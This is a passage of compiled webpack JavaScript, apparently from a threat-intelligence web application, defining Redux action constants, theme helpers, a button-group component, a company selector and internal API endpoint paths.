/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "m", function() { return FETCH_INDICATOR_TAGS_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "l", function() { return FETCH_INDICATOR_TAGS_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return ADD_INDICATOR_TAG; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return ADD_INDICATOR_TAG_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return ADD_INDICATOR_TAG_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return ADD_INDICATOR_TAGS_BULK; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "n", function() { return REMOVE_INDICATOR_TAG; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "p", function() { return REMOVE_INDICATOR_TAG_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "o", function() { return REMOVE_INDICATOR_TAG_FAILURE; });
var prefix = function prefix(str) {
  return 'station/tags/' + str;
};

var SET_MODAL_OPTIONS = prefix('SET_MODAL_OPTIONS');

var FETCH_ATTRIBUTES = prefix('FETCH_ATTRIBUTES');
var FETCH_ATTRIBUTES_SUCCESS = prefix('FETCH_ATTRIBUTES_SUCCESS');
var FETCH_ATTRIBUTES_FAILURE = prefix('FETCH_ATTRIBUTES_FAILURE');

var FETCH_ENCLAVE_TAGS = prefix('FETCH_ENCLAVE_TAGS');
var FETCH_ENCLAVE_TAGS_SUCCESS = prefix('FETCH_ENCLAVE_TAGS_SUCCESS');
var FETCH_ENCLAVE_TAGS_FAILURE = prefix('FETCH_ENCLAVE_TAGS_FAILURE');

var FETCH_INDICATOR_TAGS = prefix('FETCH_INDICATOR_TAGS');
var FETCH_INDICATOR_TAGS_SUCCESS = prefix('FETCH_INDICATOR_TAGS_SUCCESS');
var FETCH_INDICATOR_TAGS_FAILURE = prefix('FETCH_INDICATOR_TAGS_FAILURE');

var ADD_INDICATOR_TAG = prefix('ADD_INDICATOR_TAG');
var ADD_INDICATOR_TAG_SUCCESS = prefix('ADD_INDICATOR_TAG_SUCCESS');
var ADD_INDICATOR_TAG_FAILURE = prefix('ADD_INDICATOR_TAG_FAILURE');
var ADD_INDICATOR_TAGS_BULK = prefix('ADD_INDICATOR_TAGS_BULK');

var REMOVE_INDICATOR_TAG = prefix('REMOVE_INDICATOR_TAG');
var REMOVE_INDICATOR_TAG_SUCCESS = prefix('REMOVE_INDICATOR_TAG_SUCCESS');
var REMOVE_INDICATOR_TAG_FAILURE = prefix('REMOVE_INDICATOR_TAG_FAILURE');

/***/ }),
/* 365 */,
/* 366 */,
/* 367 */,
/* 368 */,
/* 369 */,
/* 370 */,
/* 371 */,
/* 372 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "s", function() { return STORE_ANALYSIS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return FETCH_ALL; });
/* unused harmony export FETCH_ANALYSES */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "f", function() { return FETCH_ANALYSES_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return FETCH_ANALYSES_FAILURE; });
/* unused harmony export FETCH_SHARED_ANALYSES */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "k", function() { return FETCH_SHARED_ANALYSES_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "j", function() { return FETCH_SHARED_ANALYSES_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "g", function() { return FETCH_ANALYSIS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "i", function() { return FETCH_ANALYSIS_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "h", function() { return FETCH_ANALYSIS_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "l", function() { return SAVE_ANALYSIS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "n", function() { return SAVE_ANALYSIS_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "m", function() { return SAVE_ANALYSIS_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "t", function() { return UPDATE_ANALYSIS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "v", function() { return UPDATE_ANALYSIS_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "u", function() { return UPDATE_ANALYSIS_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "p", function() { return SHARE_ANALYSIS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "r", function() { return SHARE_ANALYSIS_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "q", function() { return SHARE_ANALYSIS_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return DELETE_ANALYSIS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return DELETE_ANALYSIS_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return DELETE_ANALYSIS_FAILURE; });
/* unused harmony export FETCH_EXPLOSION */
/* unused harmony export FETCH_EXPLOSION_SUCCESS */
/* unused harmony export FETCH_EXPLOSION_FAILURE */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "o", function() { return SET_DISPLAY_OPTIONS; });
var prefix = function prefix(str) {
  return 'station/analysis/' + str;
};

var STORE_ANALYSIS = prefix('STORE_ANALYSIS');

var FETCH_ALL = prefix('FETCH_ALL');

var FETCH_ANALYSES = prefix('FETCH_ANALYSES');
var FETCH_ANALYSES_SUCCESS = prefix('FETCH_ANALYSES_SUCCESS');
var FETCH_ANALYSES_FAILURE = prefix('FETCH_ANALYSES_FAILURE');

var FETCH_SHARED_ANALYSES = prefix('FETCH_SHARED_ANALYSES');
var FETCH_SHARED_ANALYSES_SUCCESS = prefix('FETCH_SHARED_ANALYSES_SUCCESS');
var FETCH_SHARED_ANALYSES_FAILURE = prefix('FETCH_SHARED_ANALYSES_FAILURE');

var FETCH_ANALYSIS = prefix('FETCH_ANALYSIS');
var FETCH_ANALYSIS_SUCCESS = prefix('FETCH_ANALYSIS_SUCCESS');
var FETCH_ANALYSIS_FAILURE = prefix('FETCH_ANALYSIS_FAILURE');

var SAVE_ANALYSIS = prefix('SAVE_ANALYSIS');
var SAVE_ANALYSIS_SUCCESS = prefix('SAVE_ANALYSIS_SUCCESS');
var SAVE_ANALYSIS_FAILURE = prefix('SAVE_ANALYSIS_FAILURE');

var UPDATE_ANALYSIS = prefix('UPDATE_ANALYSIS');
var UPDATE_ANALYSIS_SUCCESS = prefix('UPDATE_ANALYSIS_SUCCESS');
var UPDATE_ANALYSIS_FAILURE = prefix('UPDATE_ANALYSIS_FAILURE');

var SHARE_ANALYSIS = prefix('SHARE_ANALYSIS');
var SHARE_ANALYSIS_SUCCESS = prefix('SHARE_ANALYSIS_SUCCESS');
var SHARE_ANALYSIS_FAILURE = prefix('SHARE_ANALYSIS_FAILURE');

var DELETE_ANALYSIS = prefix('DELETE_ANALYSIS');
var DELETE_ANALYSIS_SUCCESS = prefix('DELETE_ANALYSIS_SUCCESS');
var DELETE_ANALYSIS_FAILURE = prefix('DELETE_ANALYSIS_FAILURE');

var FETCH_EXPLOSION = prefix('FETCH_EXPLOSION');
var FETCH_EXPLOSION_SUCCESS = prefix('FETCH_EXPLOSION_SUCCESS');
var FETCH_EXPLOSION_FAILURE = prefix('FETCH_EXPLOSION_FAILURE');

var SET_DISPLAY_OPTIONS = prefix('SET_DISPLAY_OPTIONS');

/***/ }),
/* 373 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "h", function() { return FETCH_SUMMARY; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "j", function() { return FETCH_SUMMARY_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "i", function() { return FETCH_SUMMARY_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return FETCH_SUMMARIES_FOR_REPORTS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "g", function() { return FETCH_SUMMARIES_FOR_REPORTS_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "f", function() { return FETCH_SUMMARIES_FOR_REPORTS_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return CLEAR_SUMMARY; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "k", function() { return SHOW_ENTIRE_SUMMARY_TOGGLE; });
/* unused harmony export FOLD_ENTIRE_SUMMARY */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return FETCH_CS_ENCLAVE_SOURCE_MAP; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return FETCH_CS_ENCLAVE_SOURCE_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return FETCH_CS_ENCLAVE_SOURCE_FAILURE; });
var prefix = function prefix(str) {
  return 'station/summaries/' + str;
};

var FETCH_SUMMARY = prefix('FETCH_SUMMARY');
var FETCH_SUMMARY_SUCCESS = prefix('FETCH_SUMMARY_SUCCESS');
var FETCH_SUMMARY_FAILURE = prefix('FETCH_SUMMARY_FAILURE');

var FETCH_SUMMARIES_FOR_REPORTS = prefix('FETCH_SUMMARIES_FOR_REPORTS');
var FETCH_SUMMARIES_FOR_REPORTS_SUCCESS = prefix('FETCH_SUMMARIES_FOR_REPORTS_SUCCESS');
var FETCH_SUMMARIES_FOR_REPORTS_FAILURE = prefix('FETCH_SUMMARIES_FOR_REPORTS_FAILURE');

var CLEAR_SUMMARY = prefix('CLEAR_SUMMARY');

var SHOW_ENTIRE_SUMMARY_TOGGLE = prefix('SHOW_ENTIRE_SUMMARY_TOGGLE');
var FOLD_ENTIRE_SUMMARY = prefix('FOLD_ENTIRE_SUMMARY');

var FETCH_CS_ENCLAVE_SOURCE_MAP = prefix('FETCH_CS_ENCLAVE_SOURCE_MAP');
var FETCH_CS_ENCLAVE_SOURCE_SUCCESS = prefix('FETCH_CS_ENCLAVE_SOURCE_SUCCESS');
var FETCH_CS_ENCLAVE_SOURCE_FAILURE = prefix('FETCH_CS_ENCLAVE_SOURCE_FAILURE');

/***/ }),
/* 374 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__scope__ = __webpack_require__(1420);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return __WEBPACK_IMPORTED_MODULE_0__scope__["b"]; });
/* unused harmony reexport Scope */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__hub__ = __webpack_require__(3224);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return __WEBPACK_IMPORTED_MODULE_1__hub__["a"]; });
/* unused harmony reexport getHubFromCarrier */
/* unused harmony reexport getMainCarrier */
/* unused harmony reexport Hub */
/* unused harmony reexport makeMain */
/* unused harmony reexport setHubOnCarrier */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__span__ = __webpack_require__(1424);
/* unused harmony reexport Span */
/* unused harmony reexport TRACEPARENT_REGEXP */



//# sourceMappingURL=index.js.map

/***/ }),
/* 375 */,
/* 376 */,
/* 377 */,
/* 378 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return getButtonColorDefaultTheme; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return getButtonColorWithTheme; });
/* harmony export (immutable) */ __webpack_exports__["c"] = getHoverShade;
/* harmony export (immutable) */ __webpack_exports__["e"] = makeBaseHex;
/* harmony export (immutable) */ __webpack_exports__["d"] = inDarkMode;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_trustar_2_0_themes__ = __webpack_require__(77);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__constants__ = __webpack_require__(406);





var getButtonColorDefaultTheme = function getButtonColorDefaultTheme(bootstrapName) {
  return getButtonColorWithTheme(bootstrapName, __WEBPACK_IMPORTED_MODULE_0_trustar_2_0_themes__["b" /* DefaultTheme */]);
};

var getButtonColorWithTheme = function getButtonColorWithTheme(bootstrapName, theme) {
  var ThemeColors = theme.ThemeColors;

  switch (bootstrapName) {
    case 'primary':
      return ThemeColors.PRIMARY;
    case 'secondary':
      return ThemeColors.SECONDARY;
    case 'tertiary':
      return ThemeColors.TERTIARY;
    case 'warning':
      return ThemeColors.WARNING;
    case 'danger':
      return ThemeColors.DANGER;
    case 'light':
      return ThemeColors.LIGHT;
    case 'dark':
      return ThemeColors.DARK;
    case 'success':
      return ThemeColors.SUCCESS;
    case 'info':
      return ThemeColors.INFO;
    default:
      return ThemeColors.PRIMARY;
  }
};

// If we want some color to have different shades for their hover, default is X600
var hoverShadeMap = {
  // 'MINE_SHAFT' : 'X600'   // Example
};

function getHoverShade() {
  var customShade = hoverShadeMap[this.name];
  return customShade ? this[customShade] : this.X600;
}

function makeBaseHex(color) {
  var xValue = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : 'X700';

  return Object.assign({}, color, { hex: color[xValue] });
}

function inDarkMode(theme) {
  return theme.Config.name === 'Dark Theme';
}

/***/ }),
/* 379 */,
/* 380 */,
/* 381 */,
/* 382 */,
/* 383 */,
/* 384 */,
/* 385 */,
/* 386 */,
/* 387 */,
/* 388 */,
/* 389 */,
/* 390 */,
/* 391 */,
/* 392 */,
/* 393 */,
/* 394 */,
/* 395 */,
/* 396 */,
/* 397 */,
/* 398 */,
/* 399 */,
/* 400 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__actions_js__ = __webpack_require__(76);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "actions", function() { return __WEBPACK_IMPORTED_MODULE_0__actions_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__getters_js__ = __webpack_require__(2899);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "getters", function() { return __WEBPACK_IMPORTED_MODULE_1__getters_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__stores_js__ = __webpack_require__(2900);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "default", function() { return __WEBPACK_IMPORTED_MODULE_2__stores_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__epics_js__ = __webpack_require__(2901);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "epic", function() { return __WEBPACK_IMPORTED_MODULE_3__epics_js__["a"]; });








/***/ }),
/* 401 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_styled_components__ = __webpack_require__(11);



var ButtonGroup = __WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */].div.withConfig({
  displayName: 'ButtonGroup',
  componentId: 'sc-1aqkk8v-0'
})(['display:', ';justify-content:center;align-items:center;padding:0.75rem 0;', ' ', '   ', '    ', ' &&{button:not(:last-of-type){margin-right:0.5rem;}}'], function (_ref) {
  var fillContainer = _ref.fillContainer;
  return fillContainer ? 'flex' : 'inline-flex';
}, function (_ref2) {
  var alignRight = _ref2.alignRight;
  return alignRight && Object(__WEBPACK_IMPORTED_MODULE_1_styled_components__["b" /* css */])(['justify-content:flex-end;align-items:center;']);
}, function (_ref3) {
  var fillContainer = _ref3.fillContainer;
  return fillContainer && Object(__WEBPACK_IMPORTED_MODULE_1_styled_components__["b" /* css */])(['width:100%;']);
}, function (_ref4) {
  var alignLeft = _ref4.alignLeft;
  return alignLeft && Object(__WEBPACK_IMPORTED_MODULE_1_styled_components__["b" /* css */])(['justify-content:flex-start;align-items:center;']);
}, function (_ref5) {
  var disabled = _ref5.disabled;
  return disabled && Object(__WEBPACK_IMPORTED_MODULE_1_styled_components__["b" /* css */])(['opacity:0.8;pointer-events:none;']);
});

/* harmony default export */ __webpack_exports__["a"] = (ButtonGroup);

/***/ }),
/* 402 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "getQuota", function() { return getQuota; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "getQuotaFromCompany", function() { return getQuotaFromCompany; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "connectSelect", function() { return connectSelect; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react_redux__ = __webpack_require__(24);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__types_js__ = __webpack_require__(252);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__actions_js__ = __webpack_require__(1300);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7__getters_js__ = __webpack_require__(708);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "actions", function() { return __WEBPACK_IMPORTED_MODULE_6__actions_js__; });
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "getters", function() { return __WEBPACK_IMPORTED_MODULE_7__getters_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8__stores_js__ = __webpack_require__(2904);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "default", function() { return __WEBPACK_IMPORTED_MODULE_8__stores_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9__epics_js__ = __webpack_require__(2905);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "epic", function() { return __WEBPACK_IMPORTED_MODULE_9__epics_js__["a"]; });
var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };







var debug = __WEBPACK_IMPORTED_MODULE_4_debug___default()('app:modules:companies:index.js'); // eslint-disable-line no-unused-vars





var getQuota = function getQuota(quotas) {
  return quotas && quotas.size > 0 ? quotas.first() : undefined;
};

var getQuotaFromCompany = Object(__WEBPACK_IMPORTED_MODULE_3_ramda__["pipe"])(function (company) {
  return company ? company.get('requestQuotas', Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["List"])()) : Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["List"])();
}, getQuota);

/**
 * Connect a Select component (i.e. react-select) to paginated companies state
 * with search functionality.
 *
 * NOTE: In order to support some odd existing use cases in the codebase the
 * options prop can be overwritten. This means that if `options` is specified
 * the onus is on the calling code to ensure the the options object meets the
 * expected contract of react-select. Where possible prefer the options provided
 * automatically by the state mapper here.
 */

var connectSelect = Object(__WEBPACK_IMPORTED_MODULE_0_react_redux__["connect"])(function (state) {
  var options = __WEBPACK_IMPORTED_MODULE_7__getters_js__["companies"](state).toList().sort(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["alphabetize"]).map(function (company) {
    return {
      value: company.get('guid'),
      label: company.get('name')
    };
  }).toJS();

  return {
    isLoading: __WEBPACK_IMPORTED_MODULE_7__getters_js__["loading"](state),
    options: options
  };
}, function (dispatch, ownProps) {
  return { // Shudder I don't like these anonymous declarations of redux connect TODO:Refactor
    search: function search(query) {
      return dispatch(__WEBPACK_IMPORTED_MODULE_6__actions_js__["fetchWithDefaults"]({ query: query, simpleFetch: true }));
    },
    fetchInitial: function fetchInitial() {
      return dispatch(__WEBPACK_IMPORTED_MODULE_6__actions_js__["fetchWithDefaults"]({ pageSize: 100, simpleFetch: !ownProps.fetchFullCompanyInfo }));
    }
  };
}, function (stateProps, dispatchProps, ownProps) {
  var options = ownProps.options || stateProps.options; // See NOTE

  var onOpen = function onOpen() {
    if (ownProps.value) {
      dispatchProps.search(ownProps.value.label); // Do a search for the selected item so its in state
    } else {
      dispatchProps.fetchInitial();
    }
  };

  var onChange = function onChange(value) {
    debug('[ onChange ]', value);
    if (value) {
      dispatchProps.search(value.label); // Do a search for the selected item so its in state
    } else {
      dispatchProps.fetchInitial();
    }
    ownProps.onChange(value);
  };

  var onInputChange = function onInputChange(text) {
    if (!text) {
      debug('[ onInputChange ] NO VALUE');
      return;
    }

    dispatchProps.search(text); // Do a search for the selected item so its in state
  };

  return _extends({}, ownProps, stateProps, dispatchProps, {
    onMount: onOpen, // Also fetch on initial mount
    onOpen: onOpen,
    onChange: onChange,
    onInputChange: onInputChange,
    options: options
  });
});





/***/ }),
/* 403 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__actions_js__ = __webpack_require__(576);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "a", function() { return __WEBPACK_IMPORTED_MODULE_0__actions_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__getters_js__ = __webpack_require__(1350);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "c", function() { return __WEBPACK_IMPORTED_MODULE_1__getters_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__epics_js__ = __webpack_require__(1385);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return __WEBPACK_IMPORTED_MODULE_2__epics_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__stores_js__ = __webpack_require__(3192);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "d", function() { return __WEBPACK_IMPORTED_MODULE_3__stores_js__; });







// NOTE: This does not fit the pattern of the rest of our modules
// TODO: Refactor



/***/ }),
/* 404 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return LOGICAL_TYPE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return NON_LOGICAL_TYPE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return ExtractedEntitySortOptions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return ENCLAVE_MAPPING_FOR_CS_ENDPOINT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return FETCH_SUMMARIES_ENDPOINT; });
var LOGICAL_TYPE = {
  SCALAR: 'scalar',
  EPOCH: 'timestamp-millis',
  OBJECT: 'object',
  COUNTRY_CODE: 'country_code'
};

var NON_LOGICAL_TYPE = {
  ENCLAVE_ICON_LIST: 'enclave-icon-list'
};

var ExtractedEntitySortOptions = [{
  text: 'Type',
  sort: {
    sortBy: 'indicatorType',
    sortDirection: 'ASC'
  }
}, {
  text: 'Name',
  sort: {
    sortBy: 'value',
    sortDirection: 'ASC'
  }
}, {
  text: 'Has Score',
  sort: {
    sortBy: 'hasScore',
    sortDirection: 'ASC'
  }
}];

var ENCLAVE_MAPPING_FOR_CS_ENDPOINT = '/services/entity-reports/source-mappings';
var FETCH_SUMMARIES_ENDPOINT = '/services/entity-reports/summaries';

/***/ }),
/* 405 */,
/* 406 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return DARK_THEME; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return LIGHT_THEME; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return NO_THEME; });
var DARK_THEME = 'dark';
var LIGHT_THEME = 'light';
var NO_THEME = 'NONE';

/***/ }),
/* 407 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__actions_js__ = __webpack_require__(2929);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "actions", function() { return __WEBPACK_IMPORTED_MODULE_0__actions_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__getters_js__ = __webpack_require__(2930);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "getters", function() { return __WEBPACK_IMPORTED_MODULE_1__getters_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__types_js__ = __webpack_require__(499);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "types", function() { return __WEBPACK_IMPORTED_MODULE_2__types_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__stores_js__ = __webpack_require__(2931);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "default", function() { return __WEBPACK_IMPORTED_MODULE_3__stores_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__epics_js__ = __webpack_require__(2932);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "epic", function() { return __WEBPACK_IMPORTED_MODULE_4__epics_js__["a"]; });










/***/ }),
/* 408 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "filterCategories", function() { return filterCategories; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "Filters", function() { return Filters; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "getSectorAbrev", function() { return getSectorAbrev; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "GraphData", function() { return GraphData; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "CurrentGraph", function() { return CurrentGraph; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "ForcePosition", function() { return ForcePosition; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "toNodePositions", function() { return toNodePositions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "GraphMeta", function() { return GraphMeta; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "GraphHistory", function() { return GraphHistory; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "Graph", function() { return Graph; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "GraphOptions", function() { return GraphOptions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "listToOrderedMap", function() { return listToOrderedMap; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "toGraphData", function() { return toGraphData; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "connectedByEdges", function() { return connectedByEdges; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "calculateFiltered", function() { return calculateFiltered; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "removeNodes", function() { return removeNodes; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "filterNodesByTimeRange", function() { return filterNodesByTimeRange; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "getNodeTime", function() { return getNodeTime; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "getNodeTimes", function() { return getNodeTimes; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_moment__ = __webpack_require__(141);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_moment___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_moment__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_lodash_isstring__ = __webpack_require__(81);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_lodash_isstring___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4_lodash_isstring__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_5_debug__);
